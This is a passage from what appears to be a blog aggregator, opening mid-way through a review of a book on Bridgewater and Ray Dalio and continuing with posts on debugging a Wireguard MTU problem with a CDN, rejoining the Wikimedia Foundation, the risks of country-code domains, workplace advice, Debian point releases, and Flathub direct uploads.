Dalio used the tried and true method of getting free publicity from the financial press: constantly predict an upcoming downturn, and aggressively take credit whenever you were right. From nearly the start of his career, Dalio predicted economic downturns year after year. Bridgewater did very well in the 2000 to 2003 downturn, and again during the 2008 financial crisis. Dalio aggressively takes credit for predicting both of those downturns and positioning Bridgewater correctly going into them. This is correct; what he avoids mentioning is that he also predicted downturns in every other year, the majority of which never happened. These points together create a bit of an answer, but they don't feel like the whole picture and Copeland doesn't connect the pieces. It seems possible that Dalio may simply be good at investing; he reads obsessively and clearly enjoys thinking about markets, and being an abusive cult leader doesn't take up all of his time. It's also true that to some extent hedge funds are semi-free money machines, in that once you have a sufficient quantity of money and political connections you gain access to investment opportunities and mechanisms that are very likely to make money and that the typical investor simply cannot access. Dalio is clearly good at making personal connections, and invested a lot of effort into forming close ties with tricky clients such as pools of Chinese money. Perhaps the most compelling explanation isn't mentioned directly in this book but instead comes from Matt Levine. Bridgewater touts its algorithmic trading over humans making individual trades, and there is some reason to believe that consistently applying an algorithm without regard to human emotion is a solid trading strategy in at least some investment areas. Levine has asked in his newsletter, tongue firmly in cheek, whether the bizarre cult-like behavior and constant infighting is a strategy to distract all the humans and keep them from messing with the algorithm and thus making bad decisions. Copeland leaves this question unsettled. Instead, one comes away from this book with a clear vision of the most dysfunctional workplace I have ever heard of, and an endless litany of bizarre events each more astonishing than the last. If you like watching train wrecks, this is the book for you. The only drawback is that, unlike other entries in this genre such as Bad Blood or Billion Dollar Loser, Bridgewater is a wildly successful company, so you don't get the schadenfreude of seeing a house of cards collapse. You do, however, get a helpful mental model to apply to the next person who tries to talk to you about "radical honesty" and "idea meritocracy." The flaw in this book is that the existence of an organization like Bridgewater is pointing to systematic flaws in how our society works, which Copeland is largely uninterested in interrogating. "How could this have happened?" is a rather large question to leave unanswered. The sheer outrageousness of Dalio's behavior also gets a bit tiring by the end of the book, when you've seen the patterns and are hearing about the fourth variation. But this is still an astonishing book, and a worthy entry in the genre of capitalism disasters. Rating: 7 out of 10

19 February 2024

Matthew Garrett: Debugging an odd inability to stream video

We have a cabin out in the forest, and when I say "out in the forest" I mean "in a national forest subject to regulation by the US Forest Service" which means there's an extremely thick book describing the things we're allowed to do and (somewhat longer) not allowed to do. It's also down in the bottom of a valley surrounded by tall trees (the whole "forest" bit). There used to be AT&T copper but all that infrastructure burned down in a big fire back in 2021 and AT&T no longer supply new copper links, and Starlink isn't viable because of the whole "bottom of a valley surrounded by tall trees" thing along with regulations that prohibit us from putting up a big pole with a dish on top. Thankfully there's LTE towers nearby, so I'm simply using cellular data. Unfortunately my provider rate limits connections to video streaming services in order to push them down to roughly SD resolution. The easy workaround is just to VPN back to somewhere else, which in my case is just a Wireguard link back to San Francisco.

This worked perfectly for most things, but some streaming services simply wouldn't work at all. Attempting to load the video would just spin forever. Running tcpdump at the local end of the VPN endpoint showed a connection being established, some packets being exchanged, and then nothing. The remote service appeared to just stop sending packets. Tcpdumping the remote end of the VPN showed the same thing. It wasn't until I looked at the traffic on the VPN endpoint's external interface that things began to become clear.

This probably needs some background. Most network infrastructure has a maximum allowable packet size, which is referred to as the Maximum Transmission Unit or MTU. For ethernet this defaults to 1500 bytes, and these days most links are able to handle packets of at least this size, so it's pretty typical to just assume that you'll be able to send a 1500 byte packet. But what's important to remember is that that doesn't mean you have 1500 bytes of packet payload - that 1500 bytes includes whatever protocol level headers are on there. For TCP/IP you're typically looking at spending around 40 bytes on the headers, leaving somewhere around 1460 bytes of usable payload. And if you're using a VPN, things get annoying. In this case the original packet becomes the payload of a new packet, which means it needs another set of TCP (or UDP) and IP headers, and probably also some VPN header. This still all needs to fit inside the MTU of the link the VPN packet is being sent over, so if the MTU of that is 1500, the effective MTU of the VPN interface has to be lower. For Wireguard, this works out to an effective MTU of 1420 bytes. That means simply sending a 1500 byte packet over a Wireguard (or any other VPN) link won't work - adding the additional headers gives you a total packet size of over 1500 bytes, and that won't fit into the underlying link's MTU of 1500.

And yet, things work. But how? Faced with a packet that's too big to fit into a link, there are two choices - break the packet up into multiple smaller packets ("fragmentation") or tell whoever's sending the packet to send smaller packets. Fragmentation seems like the obvious answer, so I'd encourage you to read Valerie Aurora's article on how fragmentation is more complicated than you think. tl;dr - if you can avoid fragmentation then you're going to have a better life. You can explicitly indicate that you don't want your packets to be fragmented by setting the Don't Fragment bit in your IP header, and then when your packet hits a link where your packet exceeds the link MTU it'll send back a packet telling the remote that it's too big, what the actual MTU is, and the remote will resend a smaller packet. This avoids all the hassle of handling fragments in exchange for the cost of a retransmit the first time the MTU is exceeded. It also typically works these days, which wasn't always the case - people had a nasty habit of dropping the ICMP packets telling the remote that the packet was too big, which broke everything.

What I saw when I tcpdumped on the remote VPN endpoint's external interface was that the connection was getting established, and then a 1500 byte packet would arrive (this is kind of the behaviour you'd expect for video - the connection handshaking involves a bunch of relatively small packets, and then once you start sending the video stream itself you start sending packets that are as large as possible in order to minimise overhead). This 1500 byte packet wouldn't fit down the Wireguard link, so the endpoint sent back an ICMP packet to the remote telling it to send smaller packets. The remote should then have sent a new, smaller packet - instead, about a second after sending the first 1500 byte packet, it sent that same 1500 byte packet. This is consistent with it ignoring the ICMP notification and just behaving as if the packet had been dropped.

All the services that were failing were failing in identical ways, and all were using Fastly as their CDN. I complained about this on social media and then somehow ended up in contact with the engineering team responsible for this sort of thing - I sent them a packet dump of the failure, they were able to reproduce it, and it got fixed. Hurray!

(Between me identifying the problem and it getting fixed I was able to work around it. The TCP header includes a Maximum Segment Size (MSS) field, which indicates the maximum size of the payload for this connection. iptables allows you to rewrite this, so on the VPN endpoint I simply rewrote the MSS to be small enough that the packets would fit inside the Wireguard MTU. This isn't a complete fix since it's done at the TCP level rather than the IP level - so any large UDP packets would still end up breaking)

I've no idea what the underlying issue was, and at the client end the failure was entirely opaque: the remote simply stopped sending me packets. The only reason I was able to debug this at all was because I controlled the other end of the VPN as well, and even then I wouldn't have been able to do anything about it other than being in the fortuitous situation of someone able to do something about it seeing my post. How many people go through their lives dealing with things just being broken and having no idea why, and how do we fix that?

(Edit: thanks to this comment, it sounds like the underlying issue was a kernel bug that Fastly developed a fix for - under certain configurations, the kernel fails to associate the MTU update with the egress interface and so it continues sending overly large packets)

comment count unavailable comments

13 February 2024

Arturo Borrero Gonz lez: Back to the Wikimedia Foundation!

Wikimedia Foundation logo In October 2023, I departed from the Wikimedia Foundation, the non-profit organization behind well-known projects like Wikipedia and others, to join Spryker. However, in January 2024 Spryker conducted a round of layoffs reportedly due to budget and business reasons. I was among those affected, being let go just three months after joining the company. Fortunately, the Wikimedia Cloud Services team, where I previously worked, was still seeking to backfill my position, so I reached out to them. They graciously welcomed me back as a Senior Site Reliability Engineer, in the same team and position as before. Although this three-month career detour wasn t the outcome I initially envisioned, I found it to be a valuable experience. During this time, I gained knowledge in a new tech stack, based on AWS, and discovered new engineering methodologies. Additionally, I had the opportunity to meet some wonderful individuals. I believe I have emerged stronger from this experience. Returning to the Wikimedia Foundation is truly motivating. It feels privileged to be part of this mature organization, its community, and movement, with its inspiring mission and values. In addition, I m hoping that this also means I can once again dedicate a bit more attention to my FLOSS activities, such as my duties within the Debian project. My email address is back online: aborrero@wikimedia.org. You can find me again in the IRC libera.chat server, in the usual wikimedia channels, nick arturo.

Matthew Palmer: Not all TLDs are Created Equal

In light of the recent cancellation of the queer.af domain registration by the Taliban, the fragile and difficult nature of country-code top-level domains (ccTLDs) has once again been comprehensively demonstrated. Since many people may not be aware of the risks, I thought I d give a solid explainer of the whole situation, and explain why you should, in general, not have anything to do with domains which are registered under ccTLDs.

Top-level What-Now? A top-level domain (TLD) is the last part of a domain name (the collection of words, separated by periods, after the https:// in your web browser s location bar). It s the com in example.com, or the af in queer.af. There are two kinds of TLDs: country-code TLDs (ccTLDs) and generic TLDs (gTLDs). Despite all being TLDs, they re very different beasts under the hood.

What s the Difference? Generic TLDs are what most organisations and individuals register their domains under: old-school technobabble like com , net , or org , historical oddities like gov , and the new-fangled world of words like tech , social , and bank . These gTLDs are all regulated under a set of rules created and administered by ICANN (the Internet Corporation for Assigned Names and Numbers ), which try to ensure that things aren t a complete wild-west, limiting things like price hikes (well, sometimes, anyway), and providing means for disputes over names1. Country-code TLDs, in contrast, are all two letters long2, and are given out to countries to do with as they please. While ICANN kinda-sorta has something to do with ccTLDs (in the sense that it makes them exist on the Internet), it has no authority to control how a ccTLD is managed. If a country decides to raise prices by 100x, or cancel all registrations that were made on the 12th of the month, there s nothing anyone can do about it. If that sounds bad, that s because it is. Also, it s not a theoretical problem the Taliban deciding to asssert its bigotry over the little corner of the Internet namespace it has taken control of is far from the first time that ccTLDs have caused grief.

Shifting Sands The queer.af cancellation is interesting because, at the time the domain was reportedly registered, 2018, Afghanistan had what one might describe as, at least, a different political climate. Since then, of course, things have changed, and the new bosses have decided to get a bit more active. Those running queer.af seem to have seen the writing on the wall, and were planning on moving to another, less fraught, domain, but hadn t completed that move when the Taliban came knocking.

The Curious Case of Brexit When the United Kingdom decided to leave the European Union, it fell foul of the EU s rules for the registration of domains under the eu ccTLD3. To register (and maintain) a domain name ending in .eu, you have to be a resident of the EU. When the UK ceased to be part of the EU, residents of the UK were no longer EU residents. Cue much unhappiness, wailing, and gnashing of teeth when this was pointed out to Britons. Some decided to give up their domains, and move to other parts of the Internet, while others managed to hold onto them by various legal sleight-of-hand (like having an EU company maintain the registration on their behalf). In any event, all very unpleasant for everyone involved.

Geopolitics on the Internet?!? After Russia invaded Ukraine in February 2022, the Ukranian Vice Prime Minister asked ICANN to suspend ccTLDs associated with Russia. While ICANN said that it wasn t going to do that, because it wouldn t do anything useful, some domain registrars (the companies you pay to register domain names) ceased to deal in Russian ccTLDs, and some websites restricted links to domains with Russian ccTLDs. Whether or not you agree with the sort of activism implied by these actions, the fact remains that even the actions of a government that aren t directly related to the Internet can have grave consequences for your domain name if it s registered under a ccTLD. I don t think any gTLD operator will be invading a neighbouring country any time soon.

Money, Money, Money, Must Be Funny When you register a domain name, you pay a registration fee to a registrar, who does administrative gubbins and causes you to be able to control the domain name in the DNS. However, you don t own that domain name4 you re only renting it. When the registration period comes to an end, you have to renew the domain name, or you ll cease to be able to control it. Given that a domain name is typically your brand or identity online, the chances are you d prefer to keep it over time, because moving to a new domain name is a massive pain, having to tell all your customers or users that now you re somewhere else, plus having to accept the risk of someone registering the domain name you used to have and capturing your traffic it s all a gigantic hassle. For gTLDs, ICANN has various rules around price increases and bait-and-switch pricing that tries to keep a lid on the worst excesses of registries. While there are any number of reasonable criticisms of the rules, and the Internet community has to stay on their toes to keep ICANN from totally succumbing to regulatory capture, at least in the gTLD space there s some degree of control over price gouging. On the other hand, ccTLDs have no effective controls over their pricing. For example, in 2008 the Seychelles increased the price of .sc domain names from US$25 to US$75. No reason, no warning, just pay up .

Who Is Even Getting That Money? A closely related concern about ccTLDs is that some of the cool ones are assigned to countries that are not great. The poster child for this is almost certainly Libya, which has the ccTLD ly . While Libya was being run by a terrorist-supporting extremist, companies thought it was a great idea to have domain names that ended in .ly. These domain registrations weren t (and aren t) cheap, and it s hard to imagine that at least some of that money wasn t going to benefit the Gaddafi regime. Similarly, the British Indian Ocean Territory, which has the io ccTLD, was created in a colonialist piece of chicanery that expelled thousands of native Chagossians from Diego Garcia. Money from the registration of .io domains doesn t go to the (former) residents of the Chagos islands, instead it gets paid to the UK government. Again, I m not trying to suggest that all gTLD operators are wonderful people, but it s not particularly likely that the direct beneficiaries of the operation of a gTLD stole an island chain and evicted the residents.

Are ccTLDs Ever Useful? The answer to that question is an unqualified maybe . I certainly don t think it s a good idea to register a domain under a ccTLD for vanity purposes: because it makes a word, is the same as a file extension you like, or because it looks cool. Those ccTLDs that clearly represent and are associated with a particular country are more likely to be OK, because there is less impetus for the registry to try a naked cash grab. Unfortunately, ccTLD registries have a disconcerting habit of changing their minds on whether they serve their geographic locality, such as when auDA decided to declare an open season in the .au namespace some years ago. Essentially, while a ccTLD may have geographic connotations now, there s not a lot of guarantee that they won t fall victim to scope creep in the future. Finally, it might be somewhat safer to register under a ccTLD if you live in the location involved. At least then you might have a better idea of whether your domain is likely to get pulled out from underneath you. Unfortunately, as the .eu example shows, living somewhere today is no guarantee you ll still be living there tomorrow, even if you don t move house. In short, I d suggest sticking to gTLDs. They re at least lower risk than ccTLDs.

+1, Helpful If you ve found this post informative, why not buy me a refreshing beverage? My typing fingers (both of them) thank you in advance for your generosity.

Footnotes
  1. don t make the mistake of thinking that I approve of ICANN or how it operates; it s an omnishambles of poor governance and incomprehensible decision-making.
  2. corresponding roughly, though not precisely (because everything has to be complicated, because humans are complicated), to the entries in the ISO standard for Codes for the representation of names of countries and their subdivisions , ISO 3166.
  3. yes, the EU is not a country; it s part of the roughly, though not precisely caveat mentioned previously.
  4. despite what domain registrars try very hard to imply, without falling foul of deceptive advertising regulations.

12 February 2024

Andrew Cater: Lessons from (and for) colleagues - and, implicitly, how NOT to get on

I have had excellent colleagues both at my day job and, especially, in Debian over the last thirty-odd years. Several have attempted to give me good advice - others have been exemplars. People retire: sadly, people die. What impression do you want to leave behind when you leave here?Belatedly, I've come to realise that obduracy, sheer bloody mindedness, force of will and obstinacy will only get you so far. The following began very much as a tongue in cheek private memo to myself a good few years ago. I showed it to a colleague who suggested at the time that I should share it to a wider audience.

SOME ADVICE YOU MAY BENEFIT FROM

Personal conduct
  • Never argue with someone you believe to be arguing idiotically - a dispassionate bystander may have difficulty telling who's who.
  • You can't make yourself seem reasonable by behaving unreasonably
  • It does not matter how correct your point of view is if you get people's backs up
  • They may all be #####, @@@@@, %%%% and ******* - saying so out loud doesn't help improve matters and may make you seem intemperate.

Working with others
  • Be the change you want to be and behave the way you want others to behave in order to achieve the desired outcome.
  • You can demolish someone's argument constructively and add weight to good points rather than tearing down their ideas and hard work and being ultra-critical and negative - no-one likes to be told "You know - you've got a REALLY ugly baby there"
  • It's easier to work with someone than to work against them and have to apologise repeatedly.
  • Even when you're outstanding and superlative, even you had to learn it all once. Be generous to help others learn: you shouldn't have to teach too many times if you teach correctly once and take time in doing so.

Getting the message across
  • Stop: think: write: review: (peer review if necessary): publish.
  • Clarity is all: just because you understand it doesn't mean anyone else will.
  • It does not matter how correct your point of view is if you put it across badly.
  • If you're giving advice: make sure it is:
  • Considered
  • Constructive
  • Correct as far as you can (and)
  • Refers to other people who may be able to help
  • Say thank you promptly if someone helps you and be prepared to give full credit where credit's due.

Work is like that
  • You may not know all the answers or even have the whole picture - consult, take advice - LISTEN TO THE ADVICE
  • Sometimes the right answer is not the immediately correct answer
  • Corollary: Sometimes the right answer for the business is not your suggested/preferred outcome
  • Corollary: Just because you can do it like that in the real world doesn't mean that you can do it that way inside the business. [This realisation is INTENSELY frustrating but you have to learn to deal with it]
  • DON'T ALWAYS DO IT YOURSELF - Attempt to fix the system, sometimes allow the corporate monster to fail - then do it yourself and fix it. It is always easier and tempting to work round the system and Just Flaming Do It but it doesn't solve problems in the longer term and may create more problems and ill-feeling than it solves.

    [Worked out for Andy Cater for himself after many years of fighting the system as a misguided missile - though he will freely admit that he doesn't always follow them as often as he should :) ]


10 February 2024

Andrew Cater: Debian point releases - updated media for Bullseye (11.9) and Bookworm (12.5) - 2024-02-10

It's been a LONG day: two point releases in a day takes of the order of twelve or thirteen hours of fairly solid work on behalf of those doing the releases and testing.Thanks firstly to the main Debian release team for all the initial work.Thanks to Isy, RattusRattus, Sledge and egw in Cottenham, smcv and Helen closer to the centre of Cambridge, cacin and others who have dropped in and out of IRC and helped testing.

I've been at home but active on IRC - missing the team (and the food) and drinking far too much coffee/eating too many biscuits.

We've found relatively few bugs that we haven't previously noted: it's been a good day. Back again, at some point a couple of months from now to do this all over again.With luck, I can embed a picture of the Cottenham folk below: it's fun to know _exactly_ where people are because you've been there yourself.



6 February 2024

Robert McQueen: Flathub: Pros and Cons of Direct Uploads

I attended FOSDEM last weekend and had the pleasure to participate in the Flathub / Flatpak BOF on Saturday. A lot of the session was used up by an extensive discussion about the merits (or not) of allowing direct uploads versus building everything centrally on Flathub s infrastructure, and related concerns such as automated security/dependency scanning. My original motivation behind the idea was essentially two things. The first was to offer a simpler way forward for applications that use language-specific build tools that resolve and retrieve their own dependencies from the internet. Flathub doesn t allow network access during builds, and so a lot of manual work and additional tooling is currently needed (see Python and Electron Flatpak guides). And the second was to offer a maybe more familiar flow to developers from other platforms who would just build something and then run another command to upload it to the store, without having to learn the syntax of a new build tool. There were many valid concerns raised in the room, and I think on reflection that this is still worth doing, but might not be as valuable a way forward for Flathub as I had initially hoped. Of course, for a proprietary application where Flathub never sees the source or where it s built, whether that binary is uploaded to us or downloaded by us doesn t change much. But for an FLOSS application, a direct upload driven by the developer causes a regression on a number of fronts. We re not getting too hung up on the malicious developer inserts evil code in the binary case because Flathub already works on the model of verifying the developer and the user makes a decision to trust that app we don t review the source after all. But we do lose other things such as our infrastructure building on multiple architectures, and visibility on whether the build environment or upload credentials have been compromised unbeknownst to the developer. There is now a manual review process for when apps change their metadata such as name, icon, license and permissions which would apply to any direct uploads as well. It was suggested that if only heavily sandboxed apps (eg no direct filesystem access without proper use of portals) were permitted to make direct uploads, the impact of such concerns might be somewhat mitigated by the sandboxing. However, it was also pointed out that my go-to example of Electron app developers can upload to Flathub with one command was also a bit of a fiction. At present, none of them would pass that stricter sandboxing requirement. Almost all Electron apps run old versions of Chromium with less complete portal support, needing sandbox escapes to function correctly, and Electron (and Chromium s) sandboxing still needs additional tooling/downstream patching to run inside a Flatpak. Buh-boh. I think for established projects who already ship their own binaries from their own centralised/trusted infrastructure, and for developers who have understandable sensitivities about binary integrity such such as encryption, password or financial tools, it s a definite improvement that we re able to set up direct uploads with such projects with less manual work. There are already quite a few applications including verified ones where the build recipe simply fetches a binary built elsewhere and unpacks it, and if this already done centrally by the developer, repeating the exercise on Flathub s server adds little value. However for the individual developer experience, I think we need to zoom out a bit and think about how to improve this from a tools and infrastructure perspective as we grow Flathub, and as we seek to raise funds for different sources for these improvements. I took notes for everything that was mentioned as a tooling limitation during the BOF, along with a few ideas about how we could improve things, and hope to share these soon as part of an RFP/RFI (Request For Proposals/Request for Information) process. We don t have funding yet but if we have some prospective collaborators to help refine the scope and estimate the cost/effort, we can use this to go and pursue funding opportunities.

Next.